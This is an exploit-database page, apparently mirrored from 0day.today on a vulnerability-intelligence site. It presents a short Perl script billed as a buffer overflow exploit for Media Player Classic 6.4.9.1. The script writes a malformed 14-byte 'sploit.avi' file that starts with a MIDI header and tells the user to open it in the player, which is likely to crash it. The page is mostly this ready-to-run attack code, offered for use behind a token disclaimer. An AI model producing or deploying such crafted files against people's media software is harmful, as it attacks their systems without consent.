Lucene search

K

Media Player Classic v6.4.9.1 (.avi) Buffer Overflow Exploit

🗓️ 22 Feb 2010 00:00:00Reported by cr4wl3rType 
zdt
 zdt
🔗 0day.today👁 18 Views

Media Player Classic v6.4.9.1 (.avi) Buffer Overflow Exploi

Show more
Code
============================================================
Media Player Classic v6.4.9.1 (.avi) Buffer Overflow Exploit
============================================================

#!/usr/bin/perl
 
# Media Player Classic 6.4.9.1 (.avi) Buffer Overflow Exploit
# Homepage: http://www.sourceforge.net/projects/guliverkli2/
# Exploit Coded by: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
# From: Indonesia
#
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# WARNING - WARNING - WARNING - WARNING
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#
#
# Disclaimer: The author published the information under the condition
#             that is not in the intention of the reader to use them in order to bring
#             to himself or others a profit or to bring to others damage.
#
#
# Gr33tz: No Thanks
 
 
 
print "
[+]--------------------------------------------------------------[+]
[+] Media Player Classic 6.4.9.1 (.avi) Buffer Overflow Exploit  [+]
[+] By : cr4wl3r                                                 [+]
[+]--------------------------------------------------------------[+]
";
 
 
$buff = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
 
open(file, "> sploit.avi");
print (file $buff);
print "\n\n[+] Done!\n
[+] Open with Media Player Classic\n
[+] Coded by cr4wl3r\n";



#  0day.today [2017-12-31]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
22 Feb 2010 00:00Current
7High risk
Vulners AI Score7
18
.json
Report